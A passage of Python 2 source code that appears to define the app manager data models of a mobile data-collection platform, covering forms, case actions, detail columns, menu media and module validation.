                return u"{}{}".format(ATTACHMENT_PREFIX, key)
            return key
        return format_key
    def export_json(self, dump_json=True):
        source = self.to_json()
        # unique_id is app-local, so strip it from exports
        del source['unique_id']
        return json.dumps(source) if dump_json else source
    def rename_lang(self, old_lang, new_lang):
        _rename_key(self.name, old_lang, new_lang)
        try:
            self.rename_xform_language(old_lang, new_lang)
        except XFormException:
            pass
    def rename_xform_language(self, old_code, new_code):
        source = XForm(self.source)
        if source.exists():
            source.rename_language(old_code, new_code)
            source = source.render()
            self.source = source
    def default_name(self):
        app = self.get_app()
        return trans(
            self.name,
            [app.default_language] + app.langs,
            include_lang=False
        )
    @property
    def full_path_name(self):
        return "%(app_name)s > %(module_name)s > %(form_name)s" % {
            'app_name': self.get_app().name,
            'module_name': self.get_module().default_name(),
            'form_name': self.default_name()
        }
    @property
    def has_fixtures(self):
        # cheap substring check on the raw XML rather than a full parse
        return 'src="jr://fixture/item-list:' in self.source
    def get_auto_gps_capture(self):
        app = self.get_app()
        if app.build_version and app.enable_auto_gps:
            return self.auto_gps_capture or app.auto_gps_capture
        else:
            return False
    def is_registration_form(self, case_type=None):
        """
        Should return True if this form passes the following tests:
         * does not require a case
         * registers a case of type 'case_type' if supplied
        """
        raise NotImplementedError()
    def uses_usercase(self):
        raise NotImplementedError()
    def update_app_case_meta(self, app_case_meta):
        # subclasses may override to contribute case metadata
        pass
    @property
    @memoized
    def case_list_modules(self):
        # modules that use this form as their case list registration form
        case_list_modules = [
            mod for mod in self.get_app().get_modules() if mod.case_list_form.form_id == self.unique_id
        ]
        return case_list_modules
    @property
    def is_case_list_form(self):
        return bool(self.case_list_modules)
class IndexedFormBase(FormBase, IndexedSchema, CommentMixin):
    """A FormBase that lives inside a module's form list and knows its parent."""
    def get_app(self):
        # _parent is the module; _parent._parent is the app
        return self._parent._parent
    def get_module(self):
        return self._parent
    def get_case_type(self):
        return self._parent.case_type
    def check_case_properties(self, all_names=None, subcase_names=None, case_tag=None):
        """Return error dicts for illegal or reserved case property names."""
        all_names = all_names or []
        subcase_names = subcase_names or []
        errors = []
        # reserved_words are hard-coded in three different places!
        # Here, case-config-ui-*.js, and module_view.html
        reserved_words = load_case_reserved_words()
        for key in all_names:
            try:
                # NOTE(review): validate_property is not imported by name here;
                # presumably it arrives via a star import -- verify
                validate_property(key)
            except ValueError:
                errors.append({'type': 'update_case word illegal', 'word': key, 'case_tag': case_tag})
            _, key = split_path(key)
            if key in reserved_words:
                errors.append({'type': 'update_case uses reserved word', 'word': key, 'case_tag': case_tag})
        # no parent properties for subcase
        for key in subcase_names:
            if not re.match(r'^[a-zA-Z][\w_-]*$', key):
                errors.append({'type': 'update_case word illegal', 'word': key, 'case_tag': case_tag})
        return errors
    def check_paths(self, paths):
        """Return error dicts for question paths that don't exist in the form
        (or that point at uploads when multimedia case properties are off)."""
        errors = []
        try:
            valid_paths = {question['value']: question['tag']
                           for question in self.get_questions(langs=[], include_triggers=True)}
        except XFormException as e:
            errors.append({'type': 'invalid xml', 'message': unicode(e)})
        else:
            no_multimedia = not self.get_app().enable_multimedia_case_property
            for path in set(paths):
                if path not in valid_paths:
                    errors.append({'type': 'path error', 'path': path})
                elif no_multimedia and valid_paths[path] == "upload":
                    errors.append({'type': 'multimedia case property not supported', 'path': path})
        return errors
    def add_property_save(self, app_case_meta, case_type, name,
                          questions, question_path, condition=None):
        # record a save if the question exists, otherwise record an error
        if question_path in questions:
            app_case_meta.add_property_save(
                case_type,
                name,
                self.unique_id,
                questions[question_path],
                condition
            )
        else:
            app_case_meta.add_property_error(
                case_type,
                name,
                self.unique_id,
                "%s is not a valid question" % question_path
            )
    def add_property_load(self, app_case_meta, case_type, name,
                          questions, question_path):
        # record a load if the question exists, otherwise record an error
        if question_path in questions:
            app_case_meta.add_property_load(
                case_type,
                name,
                self.unique_id,
                questions[question_path]
            )
        else:
            app_case_meta.add_property_error(
                case_type,
                name,
                self.unique_id,
                "%s is not a valid question" % question_path
            )
class JRResourceProperty(StringProperty):
    """A string property that must hold a JavaRosa resource path (``jr://...``)."""

    def validate(self, value, required=True):
        """Validate that ``value``, when present, uses the ``jr://`` scheme.

        :param value: candidate resource path (may be None)
        :param required: passed through to StringProperty.validate
        :returns: the validated value
        :raises BadValueError: if value is set but lacks the jr:// prefix
        """
        super(JRResourceProperty, self).validate(value, required)
        if value is not None and not value.startswith('jr://'):
            # Fixed: the original message had an unbalanced quote
            # ("must start with 'jr://").
            raise BadValueError("JR Resources must start with 'jr://'")
        return value
class NavMenuItemMediaMixin(DocumentSchema):
    """
    Language-specific icon and audio.
    Properties are map of lang-code to filepath
    """
    media_image = SchemaDictProperty(JRResourceProperty)
    media_audio = SchemaDictProperty(JRResourceProperty)

    @classmethod
    def wrap(cls, data):
        # ToDo - Remove after migration
        # Lazy migration: media used to be stored as a single path string;
        # wrap it into a {'default': path} language map.
        for media_attr in ('media_image', 'media_audio'):
            old_media = data.get(media_attr, None)
            if old_media and isinstance(old_media, basestring):
                new_media = {'default': old_media}
                data[media_attr] = new_media
        return super(NavMenuItemMediaMixin, cls).wrap(data)

    def _get_media_by_language(self, media_attr, lang, strict=False):
        """
        Return media-path for given language if one exists, else 1st path in the
        sorted lang->media-path list

        *args:
            media_attr: one of 'media_image' or 'media_audio'
            lang: language code

        **kwargs:
            strict: whether to return None if media-path is not set for lang or
                    to return first path in sorted lang->media-path list
        """
        assert media_attr in ('media_image', 'media_audio')

        media_dict = getattr(self, media_attr)
        if not media_dict:
            return None
        if media_dict.get(lang, ''):
            return media_dict[lang]

        if not strict:
            # if the queried lang key doesn't exist,
            # return the first in the sorted list
            # NOTE(review): `lang` here shadows the parameter; the loop
            # returns on its first iteration, so only the first sorted
            # entry is ever used.
            for lang, item in sorted(media_dict.items()):
                return item

    @property
    def default_media_image(self):
        # For older apps that were migrated
        return self.icon_by_language('default')

    @property
    def default_media_audio(self):
        # For older apps that were migrated
        return self.audio_by_language('default')

    def icon_by_language(self, lang, strict=False):
        return self._get_media_by_language('media_image', lang, strict=strict)

    def audio_by_language(self, lang, strict=False):
        return self._get_media_by_language('media_audio', lang, strict=strict)

    def _set_media(self, media_attr, lang, media_path):
        """
        Caller's responsibility to save doc.
        Currently only called from the view which saves after all Edits
        """
        assert media_attr in ('media_image', 'media_audio')
        media_dict = getattr(self, media_attr) or {}
        # Storing '' (rather than deleting the key) marks the lang as unset.
        media_dict[lang] = media_path or ''
        setattr(self, media_attr, media_dict)

    def set_icon(self, lang, icon_path):
        self._set_media('media_image', lang, icon_path)

    def set_audio(self, lang, audio_path):
        self._set_media('media_audio', lang, audio_path)

    def _all_media_paths(self, media_attr):
        """All distinct non-empty paths configured for ``media_attr``."""
        assert media_attr in ('media_image', 'media_audio')
        media_dict = getattr(self, media_attr) or {}
        valid_media_paths = {media for media in media_dict.values() if media}
        return list(valid_media_paths)

    def all_image_paths(self):
        return self._all_media_paths('media_image')

    def all_audio_paths(self):
        return self._all_media_paths('media_audio')

    def icon_app_string(self, lang, for_default=False):
        """
        Return lang/app_strings.txt translation for given lang
        if a path exists for the lang

        **kwargs:
            for_default: whether app_string is for default/app_strings.txt
        """
        if not for_default and self.icon_by_language(lang, strict=True):
            return self.icon_by_language(lang, strict=True)

        if for_default:
            return self.icon_by_language(lang, strict=False)

    def audio_app_string(self, lang, for_default=False):
        """
        see note on self.icon_app_string
        """
        if not for_default and self.audio_by_language(lang, strict=True):
            return self.audio_by_language(lang, strict=True)

        if for_default:
            return self.audio_by_language(lang, strict=False)
class Form(IndexedFormBase, NavMenuItemMediaMixin):
    """A form in a basic ``Module``.

    Couples the form's XML source with its case-management configuration
    (``actions``) and menu media (via NavMenuItemMediaMixin).
    """
    form_type = 'module_form'

    # XPath filter controlling when the form is shown in the menu
    form_filter = StringProperty()
    # What must be selected before the form can be opened
    requires = StringProperty(choices=["case", "referral", "none"], default="none")
    actions = SchemaProperty(FormActions)

    def add_stuff_to_xform(self, xform, build_profile_id=None):
        # Layer case blocks and meta on top of the base form XML.
        super(Form, self).add_stuff_to_xform(xform, build_profile_id)
        xform.add_case_and_meta(self)

    def all_other_forms_require_a_case(self):
        """True if every *other* form in this module requires a case."""
        m = self.get_module()
        return all([form.requires == 'case' for form in m.get_forms() if form.id != self.id])

    def session_var_for_action(self, action):
        """Return the session variable name holding the case id created by
        ``action`` — either the literal string 'open_case' or an
        OpenSubCaseAction.  Returns None for anything else.
        """
        module_case_type = self.get_module().case_type
        if action == 'open_case':
            return 'case_id_new_{}_0'.format(module_case_type)
        if isinstance(action, OpenSubCaseAction):
            subcase_type = action.case_type
            subcase_index = self.actions.subcases.index(action)
            opens_case = 'open_case' in self.active_actions()
            # An active open_case action occupies index 0, shifting subcases.
            if opens_case:
                subcase_index += 1
            return 'case_id_new_{}_{}'.format(subcase_type, subcase_index)

    def _get_active_actions(self, types):
        """Map action-type name -> action, keeping only active ones.

        List-valued actions (e.g. subcases) count as active when non-empty.
        """
        actions = {}
        for action_type in types:
            a = getattr(self.actions, action_type)
            if isinstance(a, list):
                if a:
                    actions[action_type] = a
            elif a.is_active():
                actions[action_type] = a
        return actions

    def active_actions(self):
        """The active actions applicable to this app version and the form's
        ``requires`` setting."""
        if self.get_app().application_version == APP_V1:
            action_types = (
                'open_case', 'update_case', 'close_case',
                'open_referral', 'update_referral', 'close_referral',
                'case_preload', 'referral_preload'
            )
        else:
            if self.requires == 'none':
                action_types = (
                    'open_case', 'update_case', 'close_case', 'subcases',
                    'usercase_update', 'usercase_preload',
                )
            elif self.requires == 'case':
                action_types = (
                    'update_case', 'close_case', 'case_preload', 'subcases',
                    'usercase_update', 'usercase_preload', 'load_from_form',
                )
            else:
                # this is left around for legacy migrated apps
                action_types = (
                    'open_case', 'update_case', 'close_case',
                    'case_preload', 'subcases',
                    'usercase_update', 'usercase_preload',
                )
        return self._get_active_actions(action_types)

    def active_non_preloader_actions(self):
        return self._get_active_actions((
            'open_case', 'update_case', 'close_case',
            'open_referral', 'update_referral', 'close_referral'))

    def check_actions(self):
        """Validate this form's case actions; returns a list of error dicts."""
        errors = []

        subcase_names = set()
        for subcase_action in self.actions.subcases:
            if not subcase_action.case_type:
                errors.append({'type': 'subcase has no case type'})

            subcase_names.update(subcase_action.case_properties)

        if self.requires == 'none' and self.actions.open_case.is_active() \
                and not self.actions.open_case.name_path:
            errors.append({'type': 'case_name required'})

        errors.extend(self.check_case_properties(
            all_names=self.actions.all_property_names(),
            subcase_names=subcase_names
        ))

        def generate_paths():
            # Yield every question path referenced by any active action.
            for action in self.active_actions().values():
                if isinstance(action, list):
                    actions = action
                else:
                    actions = [action]
                for action in actions:
                    for path in FormAction.get_action_paths(action):
                        yield path

        errors.extend(self.check_paths(generate_paths()))

        return errors

    def requires_case(self):
        # all referrals also require cases
        return self.requires in ("case", "referral")

    def requires_case_type(self):
        return self.requires_case() or \
            bool(self.active_non_preloader_actions())

    def requires_referral(self):
        return self.requires == "referral"

    def uses_parent_case(self):
        """
        Returns True if any of the load/update properties references the
        parent case; False otherwise
        """
        return any([name.startswith('parent/')
                    for name in self.actions.all_property_names()])

    def get_registration_actions(self, case_type):
        """
        :return: List of actions that create a case. Subcase actions are included
                 as long as they are not inside a repeat. If case_type is not None
                 only return actions that create a case of the specified type.
        """
        reg_actions = []
        if 'open_case' in self.active_actions() and (not case_type or self.get_module().case_type == case_type):
            reg_actions.append('open_case')

        subcase_actions = [action for action in self.actions.subcases if not action.repeat_context]
        if case_type:
            subcase_actions = [a for a in subcase_actions if a.case_type == case_type]

        reg_actions.extend(subcase_actions)
        return reg_actions

    def is_registration_form(self, case_type=None):
        # A registration form creates exactly one case.
        reg_actions = self.get_registration_actions(case_type)
        return len(reg_actions) == 1

    def uses_usercase(self):
        return actions_use_usercase(self.active_actions())

    def extended_build_validation(self, error_meta, xml_valid, validate_module=True):
        """Extra build-time validation: action errors (tagged with
        ``error_meta``) plus, optionally, the containing module's case
        configuration errors."""
        errors = []
        if xml_valid:
            for error in self.check_actions():
                error.update(error_meta)
                errors.append(error)

        if validate_module:
            needs_case_type = False
            needs_case_detail = False
            needs_referral_detail = False

            if self.requires_case():
                needs_case_detail = True
                needs_case_type = True
            if self.requires_case_type():
                needs_case_type = True
            if self.requires_referral():
                needs_referral_detail = True

            errors.extend(self.get_module().get_case_errors(
                needs_case_type=needs_case_type,
                needs_case_detail=needs_case_detail,
                needs_referral_detail=needs_referral_detail,
            ))

        return errors

    def get_case_updates(self, case_type):
        # This method is used by both get_all_case_properties and
        # get_usercase_properties. In the case of usercase properties, use
        # the usercase_update action, and for normal cases, use the
        # update_case action
        if case_type == self.get_module().case_type or case_type == USERCASE_TYPE:
            format_key = self.get_case_property_name_formatter()
            action = self.actions.usercase_update if case_type == USERCASE_TYPE else self.actions.update_case
            return [format_key(*item) for item in action.update.items()]
        return []

    @memoized
    def get_subcase_types(self):
        '''
        Return a list of each case type for which this Form opens a new subcase.
        :return:
        '''
        # NOTE(review): despite the docstring this is a *set*, and only
        # includes subcases whose close condition is "never".
        return {subcase.case_type for subcase in self.actions.subcases if subcase.close_condition.type == "never"}

    @memoized
    def get_parent_types_and_contributed_properties(self, module_case_type, case_type):
        """Collect (parent_case_type, relationship) pairs and the case
        properties this form contributes to subcases of ``case_type``."""
        parent_types = set()
        case_properties = set()
        for subcase in self.actions.subcases:
            if subcase.case_type == case_type:
                case_properties.update(
                    subcase.case_properties.keys()
                )
                if case_type != module_case_type and (
                        self.actions.open_case.is_active() or
                        self.actions.update_case.is_active() or
                        self.actions.close_case.is_active()):
                    parent_types.add((module_case_type, subcase.reference_id or 'parent'))
        return parent_types, case_properties

    def update_app_case_meta(self, app_case_meta):
        """Register this form's case openers/closers and property
        saves/loads onto ``app_case_meta``."""
        from corehq.apps.reports.formdetails.readable import FormQuestionResponse
        questions = {
            q['value']: FormQuestionResponse(q)
            for q in self.get_questions(self.get_app().langs, include_triggers=True,
                                        include_groups=True, include_translations=True)
        }
        module_case_type = self.get_module().case_type
        type_meta = app_case_meta.get_type(module_case_type)
        for type_, action in self.active_actions().items():
            if type_ == 'open_case':
                type_meta.add_opener(self.unique_id, action.condition)
                # The case name is saved from the open_case action's name_path.
                self.add_property_save(
                    app_case_meta,
                    module_case_type,
                    'name',
                    questions,
                    action.name_path
                )
            if type_ == 'close_case':
                type_meta.add_closer(self.unique_id, action.condition)
            if type_ == 'update_case':
                for name, question_path in FormAction.get_action_properties(action):
                    self.add_property_save(
                        app_case_meta,
                        module_case_type,
                        name,
                        questions,
                        question_path
                    )
            if type_ == 'case_preload' or type_ == 'load_from_form':
                for name, question_path in FormAction.get_action_properties(action):
                    self.add_property_load(
                        app_case_meta,
                        module_case_type,
                        name,
                        questions,
                        question_path
                    )
            if type_ == 'subcases':
                # 'subcases' is a list of OpenSubCaseAction-style actions.
                for act in action:
                    if act.is_active():
                        sub_type_meta = app_case_meta.get_type(act.case_type)
                        sub_type_meta.add_opener(self.unique_id, act.condition)
                        if act.close_condition.is_active():
                            sub_type_meta.add_closer(self.unique_id, act.close_condition)
                        for name, question_path in FormAction.get_action_properties(act):
                            self.add_property_save(
                                app_case_meta,
                                act.case_type,
                                name,
                                questions,
                                question_path
                            )
class MappingItem(DocumentSchema):
    """One key -> localized-value mapping entry, used by enum detail columns."""
    key = StringProperty()
    # lang => localized string
    value = DictProperty()

    @property
    def treat_as_expression(self):
        """
        Returns if whether the key can be treated as a valid expression that can be included in
        condition-predicate of an if-clause for e.g. if(<expression>, value, ...)
        """
        special_chars = '{}()[]=<>."\'/'
        return any(special_char in self.key for special_char in special_chars)

    @property
    def key_as_variable(self):
        """
        Return an xml variable name to represent this key.

        If the key contains spaces or a condition-predicate of an if-clause,
        return a hash of the key with "h" prepended.
        If not, return the key with "k" prepended.

        The prepended characters prevent the variable name from starting with a
        numeral, which is illegal.
        """
        if ' ' in self.key or self.treat_as_expression:
            # Python 2: md5 accepts the raw str key directly.
            return 'h{hash}'.format(hash=hashlib.md5(self.key).hexdigest()[:8])
        else:
            return 'k{key}'.format(key=self.key)

    def key_as_condition(self, property):
        """An xpath boolean expression matching ``property`` against this key."""
        if self.treat_as_expression:
            condition = dot_interpolate(self.key, property)
            return u"{condition}".format(condition=condition)
        else:
            return u"{property} = '{key}'".format(
                property=property,
                key=self.key
            )

    def ref_to_key_variable(self, index, sort_or_display):
        """Reference to this key for use inside a calculate expression.

        :param index: numeric rank of this key, used when sorting
        :param sort_or_display: either "sort" or "display"
        :raises ValueError: for any other ``sort_or_display`` value
            (previously this fell through and crashed with an opaque
            UnboundLocalError)
        """
        if sort_or_display == "sort":
            key_as_var = "{}, ".format(index)
        elif sort_or_display == "display":
            key_as_var = "${var_name}, ".format(var_name=self.key_as_variable)
        else:
            raise ValueError(
                "sort_or_display must be 'sort' or 'display', got %r" % (sort_or_display,))

        return key_as_var
class GraphAnnotations(IndexedSchema):
    """A text annotation pinned at coordinates (x, y) on a graph."""
    # lang code -> annotation text
    display_text = DictProperty()
    x = StringProperty()
    y = StringProperty()
class GraphSeries(DocumentSchema):
    """One data series of a graph (see GraphConfiguration.series)."""
    config = DictProperty()
    # lang code -> config overrides for that language
    locale_specific_config = DictProperty()
    data_path = StringProperty()
    x_function = StringProperty()
    y_function = StringProperty()
    radius_function = StringProperty()
class GraphConfiguration(DocumentSchema):
    """Graph settings for a detail column (see DetailColumn.graph_configuration)."""
    config = DictProperty()
    # lang code -> config overrides for that language
    locale_specific_config = DictProperty()
    annotations = SchemaListProperty(GraphAnnotations)
    graph_type = StringProperty()
    series = SchemaListProperty(GraphSeries)
class DetailTab(IndexedSchema):
    """
    Represents a tab in the case detail screen on the phone.
    Each tab is itself a detail, nested inside the app's "main" detail.
    """
    # lang code -> tab title
    header = DictProperty()

    # The first index, of all fields in the parent detail, that belongs to this tab
    starting_index = IntegerProperty()

    # A tab may be associated with a nodeset, resulting in a detail that
    # iterates through sub-nodes of an entity rather than a single entity
    has_nodeset = BooleanProperty(default=False)
    nodeset = StringProperty()
class DetailColumn(IndexedSchema):
    """
    Represents a column in case selection screen on the phone. Ex:
        {
            'header': {'en': 'Sex', 'por': 'Sexo'},
            'model': 'case',
            'field': 'sex',
            'format': 'enum',
            'xpath': '.',
            'enum': [
                {'key': 'm', 'value': {'en': 'Male', 'por': 'Macho'},
                {'key': 'f', 'value': {'en': 'Female', 'por': 'Fêmea'},
            ],
        }
    """
    header = DictProperty()
    model = StringProperty()
    field = StringProperty()
    format = StringProperty()

    enum = SchemaListProperty(MappingItem)
    graph_configuration = SchemaProperty(GraphConfiguration)
    case_tile_field = StringProperty()

    late_flag = IntegerProperty(default=30)
    advanced = StringProperty(default="")
    calc_xpath = StringProperty(default=".")
    filter_xpath = StringProperty(default="")
    # Interval (in days) used by the 'time-ago' format; defaults to one year.
    time_ago_interval = FloatProperty(default=365.25)

    @property
    def enum_dict(self):
        """for backwards compatibility with building 1.0 apps"""
        import warnings
        warnings.warn('You should not use enum_dict. Use enum instead',
                      DeprecationWarning)
        return dict((item.key, item.value) for item in self.enum)

    def rename_lang(self, old_lang, new_lang):
        # Rename the language key in the header and in every enum value map.
        for dct in [self.header] + [item.value for item in self.enum]:
            _rename_key(dct, old_lang, new_lang)

    @property
    def field_type(self):
        # 'field' may be "<type><sep><property>"; bare values default to
        # the 'property' type.
        if FIELD_SEPARATOR in self.field:
            return self.field.split(FIELD_SEPARATOR, 1)[0]
        else:
            return 'property'  # equivalent to property:parent/case_property

    @property
    def field_property(self):
        # The part of 'field' after the type prefix (or the whole value).
        if FIELD_SEPARATOR in self.field:
            return self.field.split(FIELD_SEPARATOR, 1)[1]
        else:
            return self.field

    class TimeAgoInterval(object):
        # Day-lengths used to convert legacy '*-ago' formats into intervals.
        map = {
            'day': 1.0,
            'week': 7.0,
            'month': 30.4375,
            'year': 365.25
        }

        @classmethod
        def get_from_old_format(cls, format):
            # Returns None for formats other than 'years-ago'/'months-ago'.
            if format == 'years-ago':
                return cls.map['year']
            elif format == 'months-ago':
                return cls.map['month']

    @classmethod
    def wrap(cls, data):
        # Lazy migration: convert legacy 'months-ago'/'years-ago' formats to
        # 'time-ago' plus a numeric interval.
        if data.get('format') in ('months-ago', 'years-ago'):
            data['time_ago_interval'] = cls.TimeAgoInterval.get_from_old_format(data['format'])
            data['format'] = 'time-ago'

        # Lazy migration: enum used to be a dict, now is a list
        # NOTE(review): sorted() over dicts relies on Python 2 dict ordering.
        if isinstance(data.get('enum'), dict):
            data['enum'] = sorted({'key': key, 'value': value}
                                  for key, value in data['enum'].items())

        return super(DetailColumn, cls).wrap(data)

    @classmethod
    def from_json(cls, data):
        """Build a column from UI JSON, normalizing enum-image media paths."""
        from corehq.apps.app_manager.views.media_utils import interpolate_media_path

        to_ret = cls.wrap(data)
        if to_ret.format == 'enum-image':
            # interpolate icons-paths
            for item in to_ret.enum:
                for lang, path in item.value.iteritems():
                    item.value[lang] = interpolate_media_path(path)
        return to_ret
class SortElement(IndexedSchema):
    """One sort rule applied to a detail screen (see Detail.sort_elements)."""
    field = StringProperty()
    type = StringProperty()
    direction = StringProperty()
class SortOnlyDetailColumn(DetailColumn):
    """This is a mock type, not intended to be part of a document"""

    @property
    def _i(self):
        """
        assert that SortOnlyDetailColumn never has ._i or .id called
        since it should never be in an app document
        """
        raise NotImplementedError()
class CaseListLookupMixin(DocumentSchema):
    """
    Allows for the addition of Android Callouts to do lookups from the CaseList

        <lookup action="" image="" name="">
            <extra key="" value="" />
            <response key="" />
            <field>
                <header><text><locale id=""/></text></header>
                <template><text><xpath function=""/></text></template>
            </field>
        </lookup>
    """
    lookup_enabled = BooleanProperty(default=False)
    lookup_action = StringProperty()
    lookup_name = StringProperty()
    lookup_image = JRResourceProperty(required=False)

    # key/value pairs for the callout's <extra> elements
    lookup_extras = SchemaListProperty()
    # keys for the callout's <response> elements
    lookup_responses = SchemaListProperty()

    lookup_display_results = BooleanProperty(default=False)  # Display callout results in case list?
    # lang code -> header for the results field
    lookup_field_header = DictProperty()
    lookup_field_template = StringProperty()
class Detail(IndexedSchema, CaseListLookupMixin):
    """
    Full configuration for a case selection screen
    """
    display = StringProperty(choices=['short', 'long'])

    columns = SchemaListProperty(DetailColumn)
    get_columns = IndexedSchema.Getter('columns')

    tabs = SchemaListProperty(DetailTab)
    get_tabs = IndexedSchema.Getter('tabs')

    sort_elements = SchemaListProperty(SortElement)
    filter = StringProperty()

    # If True, a small tile will display the case name after selection.
    persist_case_context = BooleanProperty()

    # If True, use case tiles in the case list
    use_case_tiles = BooleanProperty()
    # If given, use this string for the case tile markup instead of the default template
    custom_xml = StringProperty()
    persist_tile_on_forms = BooleanProperty()
    # If True, the in form tile can be pulled down to reveal all the case details.
    pull_down_tile = BooleanProperty()

    def get_tab_spans(self):
        '''
        Return the starting and ending indices into self.columns deliminating
        the columns that should be in each tab.
        :return:
        '''
        tabs = list(self.get_tabs())
        ret = []
        for tab in tabs:
            try:
                # Each tab ends where the next one begins...
                end = tabs[tab.id + 1].starting_index
            except IndexError:
                # ...except the last tab, which runs to the final column.
                end = len(self.columns)
            ret.append((tab.starting_index, end))
        return ret

    @parse_int([1])
    def get_column(self, i):
        # with_id attaches the column's position and parent for rendering.
        return self.columns[i].with_id(i % len(self.columns), self)

    def rename_lang(self, old_lang, new_lang):
        for column in self.columns:
            column.rename_lang(old_lang, new_lang)
class CaseList(IndexedSchema, NavMenuItemMediaMixin):
    """Configuration for a module's case (or referral/task) list menu item."""
    # lang code -> menu label
    label = DictProperty()
    # Whether the list menu item is shown at all
    show = BooleanProperty(default=False)

    def rename_lang(self, old_lang, new_lang):
        _rename_key(self.label, old_lang, new_lang)
class CaseSearchProperty(DocumentSchema):
    """
    Case properties available to search on.
    """
    name = StringProperty()
    # lang code -> display label for the search field
    label = DictProperty()
class CaseSearch(DocumentSchema):
    """
    Properties and search command label
    """
    # NOTE(review): mutable default dict — assumed DictProperty copies it per
    # instance; confirm against the schema library's behavior.
    command_label = DictProperty(default={'en': 'Search All Cases'})
    properties = SchemaListProperty(CaseSearchProperty)
class ParentSelect(DocumentSchema):
    """Configuration for selecting a related (parent) case before the case list."""
    active = BooleanProperty(default=False)
    relationship = StringProperty(default='parent')
    # NOTE(review): appears to hold the unique_id of the module supplying the
    # parent case list — confirm against suite generation.
    module_id = StringProperty()
class FixtureSelect(DocumentSchema):
    """
    Configuration for creating a details screen from a fixture which can be used to pre-filter
    cases prior to displaying the case list.

    fixture_type:       FixtureDataType.tag
    display_column:     name of the column to display in the list
    localize:           boolean if display_column actually contains the key for the localized string
    variable_column:    name of the column whose value should be saved when the user selects an item
    xpath:              xpath expression to use as the case filter
    """
    active = BooleanProperty(default=False)
    fixture_type = StringProperty()
    display_column = StringProperty()
    localize = BooleanProperty(default=False)
    variable_column = StringProperty()
    xpath = StringProperty(default='')
class DetailPair(DocumentSchema):
    """A matched (short, long) pair of Detail configurations."""
    short = SchemaProperty(Detail)
    long = SchemaProperty(Detail)

    @classmethod
    def wrap(cls, data):
        # Normalize the display markers regardless of what was stored.
        self = super(DetailPair, cls).wrap(data)
        self.short.display = 'short'
        self.long.display = 'long'
        return self
class CaseListForm(NavMenuItemMediaMixin):
    """The registration form a module's case list can launch directly."""
    # unique_id of the registration form
    form_id = FormIdProperty('modules[*].case_list_form.form_id')
    # lang code -> button label
    label = DictProperty()

    def rename_lang(self, old_lang, new_lang):
        _rename_key(self.label, old_lang, new_lang)
class ModuleBase(IndexedSchema, NavMenuItemMediaMixin, CommentMixin):
    """Base class for all module (menu) types in an application."""

    # lang code -> localized module name
    name = DictProperty(unicode)
    unique_id = StringProperty()
    case_type = StringProperty()
    # Registration form launched from this module's case list, if configured
    case_list_form = SchemaProperty(CaseListForm)
    # XPath controlling whether the module is displayed
    module_filter = StringProperty()
    # unique_id of the parent module, for nested menus
    root_module_id = StringProperty()
    fixture_select = SchemaProperty(FixtureSelect)
    auto_select_case = BooleanProperty(default=False)

    @classmethod
    def wrap(cls, data):
        # Polymorphic wrap: dispatch on doc_type to the concrete module class.
        if cls is ModuleBase:
            doc_type = data['doc_type']
            if doc_type == 'Module':
                return Module.wrap(data)
            elif doc_type == 'CareplanModule':
                return CareplanModule.wrap(data)
            elif doc_type == 'AdvancedModule':
                return AdvancedModule.wrap(data)
            elif doc_type == 'ReportModule':
                return ReportModule.wrap(data)
            elif doc_type == 'ShadowModule':
                return ShadowModule.wrap(data)
            else:
                raise ValueError('Unexpected doc_type for Module', doc_type)
        else:
            return super(ModuleBase, cls).wrap(data)

    def get_or_create_unique_id(self):
        """
        It is the caller's responsibility to save the Application
        after calling this function.

        WARNING: If called on the same doc in different requests without saving,
        this function will return a different uuid each time,
        likely causing unexpected behavior
        """
        if not self.unique_id:
            self.unique_id = random_hex()
        return self.unique_id

    get_forms = IndexedSchema.Getter('forms')
    # Same as get_forms here; subclasses may differ in which forms reach the suite.
    get_suite_forms = IndexedSchema.Getter('forms')

    @parse_int([1])
    def get_form(self, i):
        """Return form ``i`` (accepts a numeric string via @parse_int).

        :raises FormNotFoundException: when ``i`` is out of range.
        """
        try:
            return self.forms[i].with_id(i % len(self.forms), self)
        except IndexError:
            raise FormNotFoundException()

    def get_child_modules(self):
        """Modules that declare this module as their root (i.e. submenus)."""
        return [
            module for module in self.get_app().get_modules()
            if module.unique_id != self.unique_id and getattr(module, 'root_module_id', None) == self.unique_id
        ]

    @property
    def root_module(self):
        # None when this module is itself top-level.
        if self.root_module_id:
            return self._parent.get_module_by_unique_id(self.root_module_id)

    def requires_case_details(self):
        # Overridden by subclasses that need a case selection screen.
        return False

    def get_case_types(self):
        return set([self.case_type])

    def get_module_info(self):
        # Minimal dict used when reporting validation errors.
        return {
            'id': self.id,
            'name': self.name,
        }

    def get_app(self):
        return self._parent

    def default_name(self):
        """The module name in the app's default language (falling back
        through the app's other languages)."""
        app = self.get_app()
        return trans(
            self.name,
            [app.default_language] + app.langs,
            include_lang=False
        )

    def rename_lang(self, old_lang, new_lang):
        """Rename a language code throughout this module's name, forms,
        and detail screens."""
        _rename_key(self.name, old_lang, new_lang)
        for form in self.get_forms():
            form.rename_lang(old_lang, new_lang)
        for _, detail, _ in self.get_details():
            detail.rename_lang(old_lang, new_lang)

    def validate_detail_columns(self, columns):
        """Yield error dicts for detail columns whose location xpaths are
        invalid for this domain's location hierarchy."""
        from corehq.apps.app_manager.suite_xml.const import FIELD_TYPE_LOCATION
        from corehq.apps.locations.util import parent_child
        hierarchy = None
        for column in columns:
            if column.field_type == FIELD_TYPE_LOCATION:
                # Fetch the hierarchy lazily, only if a location column exists.
                hierarchy = hierarchy or parent_child(self.get_app().domain)
                try:
                    LocationXpath('').validate(column.field_property, hierarchy)
                except LocationXpathValidationError, e:
                    yield {
                        'type': 'invalid location xpath',
                        'details': unicode(e),
                        'module': self.get_module_info(),
                        'column': column,
                    }

    def get_form_by_unique_id(self, unique_id):
        # Returns None when no form matches.
        for form in self.get_forms():
            if form.get_unique_id() == unique_id:
                return form

    def validate_for_build(self):
        """Build-time validation shared by all module types; returns a list
        of error dicts."""
        errors = []
        if self.requires_case_details():
            errors.extend(self.get_case_errors(
                needs_case_type=True,
                needs_case_detail=True
            ))
        if self.case_list_form.form_id:
            try:
                form = self.get_app().get_form(self.case_list_form.form_id)
            except FormNotFoundException:
                errors.append({
                    'type': 'case list form missing',
                    'module': self.get_module_info()
                })
            else:
                # The case list form must register a case of this module's type.
                if not form.is_registration_form(self.case_type):
                    errors.append({
                        'type': 'case list form not registration',
                        'module': self.get_module_info(),
                        'form': form,
                    })
        if self.module_filter:
            is_valid, message = validate_xpath(self.module_filter)
            if not is_valid:
                errors.append({
                    'type': 'module filter has xpath error',
                    'xpath_error': message,
                    'module': self.get_module_info(),
                })

        return errors

    @memoized
